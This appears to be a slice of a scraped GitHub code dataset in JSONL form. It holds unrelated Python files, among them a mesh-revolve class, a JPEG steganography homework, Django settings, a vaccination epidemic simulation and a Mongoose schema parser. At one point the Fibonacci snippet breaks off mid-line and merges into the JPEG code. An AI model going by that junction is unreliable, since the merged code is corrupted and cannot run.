step_04()\nmain()\n","repo_name":"jsosa/delta_surf_method","sub_path":"delta_surface_method.py","file_name":"delta_surface_method.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"17533590366","text":"from classy_blocks.construct import edges\nfrom classy_blocks.construct.flat.face import Face\nfrom classy_blocks.construct.operations.loft import Loft\nfrom classy_blocks.types import VectorType\n\n\nclass Revolve(Loft):\n \"\"\"Takes a Face and revolves it by angle around axis;\n axis can be translated so that it goes through desired origin.\n\n Angle is given in radians,\n revolve is in positive sense (counter-clockwise - right hand rule)\"\"\"\n\n def __init__(self, base: Face, angle: float, axis: VectorType, origin: VectorType):\n self.base = base\n self.angle = angle\n self.axis = axis\n self.origin = origin\n\n bottom_face = base\n top_face = base.copy().rotate(angle, axis, origin)\n\n super().__init__(bottom_face, top_face)\n\n # there are 4 side edges: the simplest is to use 'axis and angle'\n for i in range(4):\n self.add_side_edge(i, edges.Angle(self.angle, self.axis))\n","repo_name":"damogranlabs/classy_blocks","sub_path":"src/classy_blocks/construct/operations/revolve.py","file_name":"revolve.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"38"} +{"seq_id":"71622050671","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 25 14:34:05 2021\n\n@author: tjoeun\n\"\"\"\ndef fibo_print(n):\n 'n미만의 피보나치 수열 print'\n for i in fibo_return(n):\n print(i, end=' ')\n print()\n \n\ndef fibo_return(n):\n 'n미만의 피보나치 수열 리스트 리턴'\n result = []\n a,b=0,1 \n while(aB\", val))\n\n def writeshort(val):\n buf.extend(struct.pack(\">H\", val))\n\n # SOI\n writeshort(0xFFD8) # SOI marker\n\n # APP0\n writeshort(0xFFE0) # APP0 marker\n writeshort(0x0010) # segment length\n writebyte(0x4A) # 'J'\n writebyte(0x46) # 'F'\n writebyte(0x49) # 'I'\n writebyte(0x46) # 'F'\n writebyte(0x00) # '\\0'\n writeshort(0x0101) # v1.1\n writebyte(0x00) # no density unit\n writeshort(0x0001) # X density = 1\n writeshort(0x0001) # Y density = 1\n writebyte(0x00) # thumbnail width = 0\n writebyte(0x00) # thumbnail height = 0\n\n # DQT\n quant_table = quant_table.reshape(-1)\n writeshort(0xFFDB) # DQT marker\n writeshort(0x0043) # segment length\n writebyte(0x00) # table 0, 8-bit precision (0)\n for index in constants.zz:\n writebyte(quant_table[index])\n\n # SOF0\n writeshort(0xFFC0) # SOF0 marker\n writeshort(0x000B) # segment length\n writebyte(0x08) # 8-bit precision\n writeshort(img_height)\n writeshort(img_width)\n writebyte(0x01) # 1 component only (grayscale)\n writebyte(0x01) # component ID = 1\n writebyte(0x11) # no subsampling\n writebyte(0x00) # quantization table 0\n\n # DHT\n writeshort(0xFFC4) # DHT marker\n writeshort(19 + constants.dc_nb_vals) # segment length\n writebyte(0x00) # table 0 (DC), type 0 (0 = Y, 1 = UV)\n for node in constants.dc_nodes[1:]:\n writebyte(node)\n for val in constants.dc_vals:\n writebyte(val)\n\n writeshort(0xFFC4) # DHT marker\n writeshort(19 + constants.ac_nb_vals)\n writebyte(0x10) # table 1 (AC), type 0 (0 = Y, 1 = UV)\n for node in constants.ac_nodes[1:]:\n writebyte(node)\n for val in constants.ac_vals:\n writebyte(val)\n\n # SOS\n writeshort(0xFFDA) # SOS marker\n writeshort(8) # segment length\n writebyte(0x01) # nb. components\n writebyte(0x01) # Y component ID\n writebyte(0x00) # Y HT = 0\n # segment end\n writebyte(0x00)\n writebyte(0x3F)\n writebyte(0x00)\n\n return buf\n\ndef embed(msg_file, cover_img_file, quant_table, stego_img_file):\n '''\n Nhúng tin mật vào ảnh jpeg (lossy) bằng phương pháp LSB với k = 1 \n (xem file slide \"07-AnTinMatTrenAnh3.pdf\", trang 13).\n Để đơn giản, ở đây ta sẽ giả định: ảnh là ảnh xám, \n có chiều dài và chiều rộng chia hết cho 8.\n \n Các tham số:\n msg_file (str): Tên file chứa secret message.\n cover_img_file (str): Tên file chứa cover image.\n quant_table (mảng numpy 8x8): Bảng quantization (bảng các số chia ở bước quantization).\n stego_img_file (str): Tên file (*.jpg) chứa stego image (kết quả sau khi nhúng).\n Giá trị trả về:\n bool: True nếu nhúng thành không, False nếu không đủ chỗ để nhúng. \n '''\n # I. Đọc cover img file\n # YOUR CODE HERE\n\n cover_img = Image.open(cover_img_file)\n cover_pixels = np.array(cover_img,dtype=int)\n width, height = cover_img.size\n max_bits_per_block = 26\n \n \n # II. Đọc msg file, chuyển msg thành msg bits, kiểm xem có đủ chỗ nhúng không, thêm 100... vào msg bits\n # YOUR CODE HERE\n \n # Đọc msg file\n with open(msg_file, 'r') as f:\n msg = f.read()\n msg_bits = bitarray()\n msg_bits.frombytes(msg.encode('utf-8'))\n \n # Kiểm xem có nhúng được không?\n capacity = max_bits_per_block*(cover_pixels.size//64)\n if len(msg_bits) + 1 > capacity:\n return False\n\n # Thêm '100...' vào msg bits\n msg_bits.extend('1' + '0' * (capacity - len(msg_bits) - 1))\n\n # III. Nén jpeg, trong quá trình nén thực hiện nhúng msg bits\n jpeg_bytes = bytearray()\n jpeg_bytes.extend(get_header(height, width, quant_table))\n huf = Huffman()\n \n # Lần lượt duyệt các khối ảnh 8x8 (theo thứ tự từ trái qua phải, từ trên xuống dưới)\n # Với mỗi khối:\n # (1) Trừ 128 rồi tính các hệ số DCT\n # (2) Tính các hệ số quantized DCT\n # (3) Nhúng msg bits vào các hệ số quantized DCT\n # (4) Nén các hệ số quantized DCT bằng thuật toán nén Huffman\n # Để nén dùng câu lệnh `huf.encode_block(quant_dct_coefs, length)`\n # Trong đó: \n # - `quant_dct_coefs` là mảng 1 chiều các hệ số quantized DCT \n # (có được bằng cách duyệt mảng 2 chiều theo thứ tự dích dắc:\n # đầu tiên, kéo mảng 2 chiều thành mảng một chiều, \n # rồi duyệt mảng một chiều này theo mảng chỉ số `constants.zz` đã được định nghĩa sẵn cho bạn)\n # - `length` là số lượng phần tử của mảng `quant_dct_coefs` tính\n # từ phần tử đầu cho đến phần tử khác 0 cuối cùng \n # (lưu ý: có thể xảy ra trường hợp tất cả phần tử đều bằng 0)\n # YOUR CODE HERE\n \n k = 0 #duyệt từng bits\n\n #vị trí nhúng sau khi chuyển về mảng một chiều\n embed_index = [\n 4 , 5 , 6 , 7 ,\n 11, 12, 13, 14,\n 18, 19, 20, 21,\n 25, 26, 27, 28,\n 32, 33, 34, 35,\n 40, 41, 42,\n 48, 49,\n 56\n ]\n\n # cover_pixels.size = 8*8*blocks \n # chia ảnh thành các khối 8x8\n for r in range(0,cover_pixels.shape[0] - 8 + 1, 8):\n for c in range(0,cover_pixels.shape[1] - 8 + 1, 8):\n block = cover_pixels[r:r+8,c:c+8]\n # (1) Trừ 128 rồi tính các hệ số DCT\n dct = dct2(block - 128)\n # (2) Tính các hệ số quantized DCT\n quantized = np.array(np.round(dct / quant_table), dtype=int)\n # (3) Nhúng msg bits vào các hệ số quantized DCT\n # Đưa về mảng 1 chiều\n quantized = quantized.flatten()\n # Nhúng msg_bits\n\n for idx in embed_index:\n quantized[idx] = ((quantized[idx]>>1<<1) | int(msg_bits[k]))\n k += 1\n \n \n # (4) Nén các hệ số quantized DCT bằng thuật toán nén Huffman\n # duyệt theo dạng zig-zag thành từng block rồi thêm block vào quant_dct_coefs\n \n quant_dct_coefs = []\n for i in constants.zz:\n quant_dct_coefs.append(quantized[i])\n\n try:\n # Lấy số lượng phần tử của mảng `quant_dct_coefs` tính từ phần tử đầu cho đến phần tử khác 0 cuối cùng \n length = np.max(np.nonzero(quant_dct_coefs)) + 1\n huf.encode_block(quant_dct_coefs, length)\n except:\n pass\n \n \n # Kết thúc encode và lấy buffer cho vào jpeg_bytes\n jpeg_bytes.extend(huf.end_and_get_buffer())\n jpeg_bytes.extend(struct.pack(\">H\", 0xFFD9)) # EOI marker\n \n\n # IV. Ghi kết quả nén jpeg xuống file\n with open(stego_img_file, 'wb') as f:\n f.write(jpeg_bytes)\n\n return True\n\n# TEST\nquant_table = np.array([\n 16, 11, 10, 16, 1, 1, 1, 1,\n 12, 12, 14, 1, 1, 1, 1, 55,\n 14, 13, 1, 1, 1, 1, 69, 56,\n 14, 1, 1, 1, 1, 87, 80, 62,\n 1, 1, 1, 1, 68, 109, 103, 77,\n 1, 1, 1, 64, 81, 104, 113, 92,\n 1, 1, 78, 87, 103, 121, 120, 101,\n 1, 92, 95, 98, 112, 100, 103, 99\n]).reshape(8, 8)\n# result = embed('msg2.txt', 'cover.bmp', quant_table, 'stego.jpg')\n# assert result == False\n\n# TEST\nresult = embed('msg.txt', 'cover.bmp', quant_table, 'stego.jpg')\nassert result == True\n\n# assert np.all(np.array(Image.open('stego.jpg')) == np.array(Image.open('correct_stego.jpg')))\n\n\na = np.array(Image.open('stego.jpg'))\nb = np.array(Image.open('correct_stego.jpg'))\n\nwith open('arr.txt','w') as f:\n for i in range(a.shape[0]):\n for j in range(a.shape[1]):\n f.write(str(a[i,j]) + ' ')\n f.write('\\n')\nwith open('arr2.txt','w') as f:\n for i in range(b.shape[0]):\n for j in range(b.shape[1]):\n f.write(str(b[i,j]) + ' ')\n f.write('\\n')\n\n\n# print(a)\n# print(b)","repo_name":"trinhvanminh/An-Du-Lieu","sub_path":"Bai Tap Da Nop/BT03/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":9481,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"40247697598","text":"# coding: utf-8\n\nfrom .base import *\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\nINSTALLED_APPS = INSTALLED_APPS + ('debug_toolbar', )\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple'\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'propagate': True,\n 'level': 'INFO',\n },\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n\n","repo_name":"hacklabr/mapasculturais-openid","sub_path":"iddacultura/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"34967534100","text":"import time\nimport numpy as np\nimport pandas as pd\nfrom policies.policy import Policy\nfrom utils.history_utils import TimeSeries\nimport logging\n\nfrom models.agent_based_network_model import STATES\nfrom utils.config_utils import ConfigFile\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\ndef _process_calendar(filename):\n df = pd.read_csv(filename)\n return (\n dict(zip(df[\"T\"], df[\"workers\"].astype(int))),\n dict(zip(df[\"T\"], df[\"elderly\"].astype(int))),\n )\n\n\nclass Vaccination(Policy):\n\n \"\"\"\n Vaccination Policy.\n \"\"\"\n\n def __init__(self, graph, model, config_file=None):\n super().__init__(graph, model)\n\n self.first_day = True\n self.stopped = False\n self.delay = None\n\n # -1 .. not vaccinated\n # >= 0 days from vaccination\n self.vaccinated = np.full(\n self.graph.num_nodes, fill_value=-1, dtype=int)\n self.nodes = np.arange(self.graph.num_nodes)\n self.days_in_E = np.zeros(self.graph.num_nodes, dtype=int)\n self.target_for_R = np.zeros(\n self.graph.num_nodes, dtype=bool) # auxiliary var\n\n # statistics\n self.stat_moved_to_R = TimeSeries(401, dtype=int)\n\n if config_file:\n cf = ConfigFile()\n cf.load(config_file)\n calendar_filename = cf.section_as_dict(\n \"CALENDAR\").get(\"calendar_filename\", None)\n if calendar_filename is None:\n raise \"Missing calendar filename in vaccination policy config file.\"\n self.workers_calendar, self.elderly_calendar = _process_calendar(\n calendar_filename)\n self.delay = cf.section_as_dict(\"CALENDAR\").get(\"delay\", None)\n\n self.first_shot_coef = cf.section_as_dict(\"EFFECT\")[\"first_shot\"]\n self.second_shot_coef = cf.section_as_dict(\"EFFECT\")[\"second_shot\"]\n else:\n raise \"Vaccination policy requires config file.\"\n\n self.old_to_vaccinate = list(np.argsort(self.graph.nodes_age))\n # self.index_to_go = len(self.sort_indicies)-1\n\n worker_id = self.graph.cat_table[\"ecactivity\"].index(\"working\")\n self.workers_to_vaccinate = list(\n self.nodes[self.graph.nodes_ecactivity == worker_id])\n # print(self.workers_to_vaccinate)\n # exit()\n\n def first_day_setup(self):\n pass\n\n def stop(self):\n \"\"\" just finish necessary, but do nothing new \"\"\"\n self.stopped = True\n\n def move_to_S(self):\n # take those who are first day E (are E AND are E the first day)\n nodes_first_E = (self.model.memberships[STATES.E] == 1).ravel()\n self.days_in_E[nodes_first_E] += 1\n nodes_first_E = np.logical_and(\n nodes_first_E,\n self.days_in_E == 1\n )\n\n if nodes_first_E.sum() == 0:\n return\n\n # By 14 days after the first shot, the effect is zero (i.e. an\n # infectedindividual becomes exposed and later symptomatic or asymptomaticas if\n # not vaccinated)•Between 14 and 20 days after the first shot, those, who are\n # infected(heading to theEcompartment) and are \"intended\" to be\n # asymptomatic(further go toIa, it is no harm to assume this decision is made\n # inforward) become recovered with probability0.29instead of\n # enteringtheEcompartment. Those, intended to be symptomatic (further gotoIp)\n # become recovered with0.46probability.•21days or more after first shot, this\n # probability of \"recovery\" is0.52for asymptomatic and0.6for symptomatic.•7days\n # after the second shot or later, the probability of \"recovery\" is0.9for\n # asymptomatic and0.92for symptomatic\n\n # divide nodes_first_E to asymptomatic candidates and symptomatic candidates\n # assert np.all(np.logical_or(\n # self.model.state_to_go[nodes_first_E, 0] == STATES.I_n,\n # self.model.state_to_go[nodes_first_E, 0] == STATES.I_a\n # )), \"inconsistent state_to_go\"\n\n self.target_for_R.fill(0)\n\n def decide_move_to_R(selected, prob):\n n = len(selected)\n print(f\"generating {n} randoms\")\n if n > 0:\n r = np.random.rand(n)\n self.target_for_R[selected] = r < prob\n\n # 14 - 20 days: 0.29 for A, 0.46 for S\n # skip those with < 14 days\n\n # for state, probs in (\n # (STATES.I_n, [0.29, 0.52, 0.9]),\n # (STATES.I_a, [0.46, 0.6, 0.92])\n # ):\n # nodes_heading_to_state = nodes_first_E.copy()\n # nodes_heading_to_state[nodes_first_E] = self.model.state_to_go[nodes_first_E, 0] == state\n # node_list = self.nodes[nodes_heading_to_state]\n\n # if not(len(node_list) > 0):\n # continue\n # # skip those who are in first 14 days\n # node_list = node_list[self.vaccinated[node_list] >= 14]\n # # select 14 - 21\n # selected = node_list[self.vaccinated[node_list] < 21]\n # decide_move_to_R(selected, probs[0])\n # # skip them\n # node_list = node_list[self.vaccinated[node_list] >= 21]\n # # selecte < second shot + 7\n # selected = node_list[self.vaccinated[node_list] < self.delay + 7]\n # decide_move_to_R(selected, probs[1])\n # # skip them\n # node_list = node_list[self.vaccinated[node_list] >= self.delay + 7]\n # decide_move_to_R(node_list, probs[2])\n\n # first shots\n\n node_list = self.nodes[nodes_first_E]\n\n if not(len(node_list) > 0):\n return\n\n # those who have only the first shot\n first_shotters = node_list[\n np.logical_and(\n self.vaccinated[node_list] >= 14,\n self.vaccinated[node_list] < self.delay + 7\n )]\n r = np.random.rand(len(first_shotters))\n go_back = first_shotters[r < self.first_shot_coef]\n self.target_for_R[go_back] = True\n\n second_shotters = node_list[self.vaccinated[node_list]\n >= self.delay + 7]\n r = np.random.rand(len(second_shotters))\n go_back = second_shotters[r < self.second_shot_coef]\n self.target_for_R[go_back] = True\n\n self.stat_moved_to_R[self.model.t] = self.target_for_R.sum()\n self.model.move_target_nodes_to_S(self.target_for_R)\n self.days_in_E[self.target_for_R] = 0\n\n def process_vaccinated(self):\n self.move_to_S()\n\n def run(self):\n\n super().run()\n\n # update vaccinated days\n already_vaccinated = self.vaccinated != -1\n self.vaccinated[already_vaccinated] += 1\n\n self.process_vaccinated()\n\n # update asymptotic rates - OBSOLETE\n # Počítám, že první týden nemá vakcíná\n # žádnou účinnost, po týdnu 50%, po dvou týdnech 70%, po druhé\n # dávce 90% a po dalším týdnu 95%\n\n # older = self.graph.nodes_age > 65\n # younger = np.logical_not(older)\n\n # # update two weeks after first vaccination\n # selected = self.vaccinated == 14\n # self.model.asymptomatic_rate[np.logical_and(selected, older)] = 0.7\n # self.model.asymptomatic_rate[np.logical_and(selected, younger)] = 0.9\n\n # # update two weeks after second vaccination\n # selected = self.vaccinated == self.delay + 14\n # self.model.asymptomatic_rate[np.logical_and(selected, older)] = 0.8\n # self.model.asymptomatic_rate[np.logical_and(selected, younger)] = 0.95\n\n # selected = self.vaccinated == 7\n # self.model.asymptomatic_rate[selected] = 0.5\n # selected = self.vaccinated == 14\n # self.model.asymptomatic_rate[selected] = 0.7\n # selected = self.vaccinated == self.delay\n # self.model.asymptomatic_rate[selected] = 0.9\n # selected = self.vaccinated == self.delay + 7\n # self.model.asymptomatic_rate[selected] = 0.95\n\n logging.debug(f\"asymptomatic rate {self.model.asymptomatic_rate.mean()}\")\n\n if self.model.T in self.elderly_calendar:\n self.vaccinate_old(self.elderly_calendar[self.model.T])\n\n if self.model.T in self.workers_calendar:\n self.vaccinate_workers(self.workers_calendar[self.model.T])\n\n def vaccinate_old(self, num):\n if num == 0:\n return\n logging.info(f\"T={self.model.T} Vaccinating {num} elderly.\")\n index = len(self.old_to_vaccinate)\n while num > 0 and index > 0:\n index -= 1\n who = self.old_to_vaccinate[index]\n if self.vaccinated[who] != -1:\n continue\n if self.model.node_detected[who]: # change to active case\n continue\n # dead are not vaccinated\n if self.model.memberships[STATES.D, who, 0] == 1:\n continue\n self.vaccinated[who] = 0\n del self.old_to_vaccinate[index]\n num -= 1\n\n def vaccinate_workers(self, num):\n if num == 0:\n return\n logging.info(f\"T={self.model.T} Vaccinating {num} workers.\")\n num_workers = len(self.workers_to_vaccinate)\n if num_workers == 0:\n return\n\n # ids_to_vaccinate = self.workers_to_vaccinate[self.model.node_detected[self.workers_to_vaccinate] == False]\n # if len(ids_to_vaccinate) == 0:\n # logging.warning(\"No more workers to vaccinate.\")\n # exit()\n # return\n # ids_to_vaccinate = ids_to_vaccinate[self.model.memberships[STATES.D, ids_to_vaccinate, 0] != 1]\n\n ids_to_vaccinate = np.logical_and(\n self.model.node_detected[self.workers_to_vaccinate] == False,\n self.model.memberships[STATES.D, self.workers_to_vaccinate, 0] != 1\n ).nonzero()[0]\n\n if len(ids_to_vaccinate) < num:\n logging.info(\"Not enough workers to vaccinate.\")\n num = len(ids_to_vaccinate)\n if num == 0:\n return\n selected_ids = np.random.choice(\n ids_to_vaccinate, size=num, replace=False)\n for index in selected_ids:\n who = self.workers_to_vaccinate[index]\n self.vaccinated[who] = 0\n for index in sorted(selected_ids, reverse=True):\n del self.workers_to_vaccinate[index]\n\n # # get all nodes that are S or Ss and were not vaccinated\n # target_nodes = np.logical_not(\n # self.model.node_detected\n # )\n # target_nodes = np.logical_and(\n # target_nodes[:,0],\n # self.vaccinated == False\n # )\n # print(target_nodes.shape)\n # pool = self.nodes[target_nodes]\n\n # # select X of them to be vaccinated\n # to_vaccinate = np.random.choice(pool, size=self.num_to_vaccinate, replace=False)\n # self.vaccinated[to_vaccinate] = True\n # self.model.asymptomatic_rate[to_vaccinate] = 0.9\n\n # # self.model.move_to_R(to_vaccinate)\n\n def to_df(self):\n index = range(0+self.model.start_day-1, self.model.t +\n self.model.start_day) # -1 + 1\n policy_name = type(self).__name__\n columns = {\n f\"moved_to_R\": self.stat_moved_to_R[:self.model.t+1],\n }\n columns[\"day\"] = np.floor(index).astype(int)\n df = pd.DataFrame(columns, index=index)\n df.index.rename('T', inplace=True)\n return df\n\n\nclass VaccinationToR(Vaccination):\n\n def process_vaccinated(self):\n # # update two weeks after first vaccination\n nodes_in_S = self.nodes[self.model.memberships[STATES.S, :, 0] == 1]\n\n selected = nodes_in_S[self.vaccinated[nodes_in_S] == 14]\n r = np.random.rand(len(selected))\n to_R = selected[r < self.first_shot_coef]\n\n self.target_for_R.fill(0)\n self.target_for_R[to_R] = True\n\n selected = nodes_in_S[self.vaccinated[nodes_in_S] == self.delay + 7]\n r = np.random.rand(len(selected))\n to_R = selected[r < (self.second_shot_coef - self.first_shot_coef)]\n self.target_for_R[to_R] = True\n\n self.stat_moved_to_R[self.model.t] = self.target_for_R.sum()\n self.model.move_target_nodes_to_R(self.target_for_R)\n self.days_in_E[self.target_for_R] = 0\n\n\nclass VaccinationToA(Vaccination):\n\n def update_asymptomatic_rates(self):\n # # update two weeks after first vaccination\n selected = self.nodes[self.vaccinated == 14]\n srate = 1 - 0.179\n self.model.asymptomatic_rate[selected] = 1 - \\\n srate*(1-self.first_shot_coef)\n\n selected = self.nodes[self.vaccinated == self.delay + 7]\n self.model.asymptomatic_rate[selected] = 1 - \\\n srate*(1-self.second_shot_coef)\n\n def process_vaccinated(self):\n self.update_asymptomatic_rates()\n\n\nclass VaccinationToSA(VaccinationToA):\n\n def process_vaccinated(self):\n self.move_to_S()\n self.update_asymptomatic_rates()\n","repo_name":"epicity-cz/model-m","sub_path":"src/policies/vaccination.py","file_name":"vaccination.py","file_ext":"py","file_size_in_byte":13000,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"19188760813","text":"import json\nimport sqlite3\nfrom xmlrpc.client import Boolean\nimport esprima\nPATH = 'PATHTOSCHEMAFILE'\n\n\ndef give_schema_ast(node):\n if node.type == \"Program\":\n return give_schema_ast(node.body[0])\n\n elif node.type == \"ExpressionStatement\":\n return give_schema_ast(node.expression)\n\n elif node.type == \"NewExpression\":\n if node.callee.name == \"Schema\":\n return give_schema_ast(node.arguments[0])\n \n elif node.type == \"CallExpression\":\n if node.callee.property.name == \"Schema\":\n return node.arguments[0]\n\n else:\n return node\n\n\n\ndef visit_schema(node):\n if node.type == \"ObjectExpression\":\n return {name: value for name, value in [visit_schema(prop) for prop in node.properties]}\n \n elif node.type == \"Property\":\n return visit_schema(node.key), visit_schema(node.value)\n \n #leaf literal\n elif node.type == \"Literal\":\n return node.value\n\n elif node.type == \"MemberExpression\":\n return visit_schema(node.object) + \".\" + visit_schema(node.property)\n \n #leafidentifier\n elif node.type == \"Identifier\":\n return node.name\n \n #just before leaf, next el should always be leaf\n elif node.type == \"ArrayExpression\":\n return [visit_schema(el) for el in node.elements]\n \n #In case they define a schema inside the schema\n elif node.type == \"NewExpression\":\n return visit_schema(node.arguments[0])\n\n\ndef get_schema_dict(file_path, coordinates):\n \"\"\"\n Returns the dict corresponding to schema at the given location\n\n parameters:\n -----------\n file_path: path to the file (str)\n coordinates: [start_line, start_column, end_line, end_column]\n\n returns:\n --------\n schema_dict: schema corresponding to the dict at the given location\n \"\"\"\n start_line, start_column, end_line, end_column = coordinates\n schema = ''\n with open(file_path, 'r') as f:\n for i in range(end_line):\n if i >= start_line-1:\n line = f.readline()\n if i == start_line-1:\n line = line[start_column-1:]\n elif i == end_line-1:\n line = line[:end_column]\n schema += line\n \n else:\n f.readline()\n tree_out = esprima.parseScript(schema)\n schema_tree = give_schema_ast(tree_out)\n return visit_schema(schema_tree)\nacc = []\ndef gather_attribute_names(schema_dict):\n \"\"\"\n gather attribute names from a specific schema dict\n\n parameters:\n -----------\n schema_dict : dict holding a mongoose schema (dict)\n\n returns:\n ---------\n attributes : list holding all attribute names\n \"\"\"\n\n if type(schema_dict) == list:\n [gather_attribute_names(el) for el in schema_dict]\n elif type(schema_dict) == dict:\n for key in schema_dict:\n if not(key in['type', 'default', 'enum', 'ref', 'index', 'alias']):\n acc.append(key)\n gather_attribute_names(schema_dict[key])\n\n","repo_name":"anoauthor/SCAM_online_appendix_274","sub_path":"codeQL_queries/javascript/python_scripts/extract_mongoose_schema.py","file_name":"extract_mongoose_schema.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1096143705","text":"import os\nimport PIL\nimport json\nimport numpy as np\nfrom PIL import Image\nfrom random import shuffle\nfrom src.utils import get_logger\n\nimport torch\nimport torchvision\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset\n\ndef random_crop(cur_img):\n width, height = cur_img.size\n if width % 2 == 1:\n width -= 1\n if height % 2 == 1:\n height -= 1\n # random crop\n if width == height:\n cur_img = np.array(cur_img).astype(np.float32)\n return np.expand_dims(cur_img, axis=0)\n elif width < height:\n diff = height - width\n move = np.random.choice(diff) - diff // 2\n left, right = 0, width\n top = (height - width) // 2 + move\n bottom = (height + width) // 2 + move\n else:\n diff = width - height\n move = np.random.choice(diff) - diff // 2\n top, bottom = 0, height\n left = (width - height) // 2 + move\n right = (width + height) // 2 + move\n\n cur_img = cur_img.crop((left, top, right, bottom))\n return cur_img\n\ndef center_crop(img):\n # center crop\n w, h = img.size\n minl = min(h, w)\n left = (w - minl) / 2\n right = (w + minl) / 2\n top = (h - minl) / 2\n bottom = (h + minl) / 2\n img = img.crop((left, top, right, bottom))\n return img\n\n\nclass VideoFramesDataset(Dataset):\n def __init__(self, datapath, idspath, img_size, num_frames):\n super().__init__()\n\n self.img_size = img_size\n self.json_path = idspath\n self.frame_path = datapath\n self.num_frames = num_frames\n\n self.video_ids = json.load(open(self.json_path, 'r'))\n self.transform = transforms.Compose([\n transforms.Resize((img_size, img_size),\n interpolation=PIL.Image.BILINEAR),\n transforms.ToTensor(),\n # transforms.Normalize(mean=[0.485, 0.456, 0.406],\n # std=[0.229, 0.224, 0.225])\n ])\n\n logger = get_logger()\n logger.info(f\"{len(self.video_ids)} videos from datapath {datapath}, \"\n f\"img_size: {img_size}, num_frames: {num_frames}\")\n\n\n def __len__(self):\n return len(self.video_ids)\n\n def skip_sample(self, ind):\n if ind >= self.__len__() - 1:\n return self.__getitem__(0)\n return self.__getitem__(ind + 1)\n\n def __getitem__(self, index):\n video_id = self.video_ids[index]\n\n # random select 4 continuous frames\n imgs = []\n cur_path = os.path.join(self.frame_path, video_id)\n files = sorted(os.listdir(cur_path))\n if len(files) == self.num_frames:\n start = 0\n else:\n start = np.random.choice(range(len(files) - self.num_frames))\n\n for file in files[start : start + self.num_frames]:\n img_path = os.path.join(cur_path, file)\n img = Image.open(img_path)\n img = random_crop(img)\n cur_img = self.transform(img).unsqueeze(0)\n imgs.append(cur_img)\n\n # concate\n ret_imgs = torch.cat(imgs, dim=0)\n return ret_imgs # [B,T,C,H,W]\n\n\n# if __name__ == \"__main__\":\n# ds = VideoFramesDataset(datapath='/home/zhongguokexueyuanzidonghuayanjiusuo/datasets/msrvtt/frames',\n# idspath='/home/zhongguokexueyuanzidonghuayanjiusuo/datasets/msrvtt/train_frames_ids.json',\n# lq_img_size=128, gt_img_size=256)\n# lq_imgs, gt_imgs = ds[0]\n# print(lq_imgs.shape)\n# print(gt_imgs.shape)\n","repo_name":"iva-mzsun/MOSO","sub_path":"MOSO-VQVAE/src/dataset/VideoFramesDataset.py","file_name":"VideoFramesDataset.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"38"} +{"seq_id":"40951046428","text":"#!/usr/bin/python3\n\nimport argparse\nimport sys\nimport json\nimport pymarc\nimport traceback\n\nfrom pymarc.exceptions import RecordLengthInvalid, RecordLeaderInvalid, BaseAddressNotFound, BaseAddressInvalid, RecordDirectoryInvalid, NoFieldsFound\n\nfrom multiprocessing import Pool, Lock\n\n\nrolemapping = {\n \"abr\": \"KürzendeR\",\n \"acp\": \"HerstellerIn von Nachbildungen\",\n \"act\": \"SchauspielerIn\",\n \"adi\": \"Art Director\",\n \"adp\": \"BearbeiterIn\",\n \"aft\": \"VerfasserIn eines Nachworts\",\n \"anl\": \"AnalytikerIn\",\n \"anm\": \"TrickfilmzeichnerIn\",\n \"ann\": \"KommentatorIn\",\n \"ant\": \"BibliographischeR VorgängerIn\",\n \"ape\": \"BerufungsbeklagteR/RevisionsbeklagteR\",\n \"apl\": \"BerufungsklägerIn/RevisionsklägerIn\",\n \"app\": \"AntragstellerIn\",\n \"aqt\": \"AutorIn von Zitaten oder Textabschnitten\",\n \"arc\": \"ArchitektIn\",\n \"ard\": \"künstlerische Leitung\",\n \"arr\": \"ArrangeurIn\",\n \"art\": \"KünstlerIn\",\n \"asg\": \"RechtsnachfolgerIn\",\n \"asn\": \"zugehöriger Name\",\n \"ato\": \"AutographIn\",\n \"att\": \"zugehöriger Name\",\n \"auc\": \"AuktionatorIn\",\n \"aud\": \"AutorIn des Dialogs\",\n \"aui\": \"VerfasserIn eines Geleitwortes\",\n \"aus\": \"DrehbuchautorIn\",\n \"aut\": \"VerfasserIn\",\n \"bdd\": \"BindungsgestalterIn\",\n \"bjd\": \"EinbandgestalterIn\",\n \"bkd\": \"BuchgestalterIn\",\n \"bkp\": \"BuchherstellerIn\",\n \"blw\": \"AutorIn des Klappentextes\",\n \"bnd\": \"BuchbinderIn\",\n \"bpd\": \"GestalterIn des Exlibris\",\n \"brd\": \"Sender\",\n \"brl\": \"BrailleschriftprägerIn\",\n \"bsl\": \"BuchhändlerIn\",\n \"cas\": \"FormgießerIn\",\n \"ccp\": \"konzeptionelle Leitung\",\n \"chr\": \"ChoreografIn\",\n \"clb\": \"MitarbeiterIn\",\n \"cli\": \"KlientIn, AuftraggeberIn\",\n \"cll\": 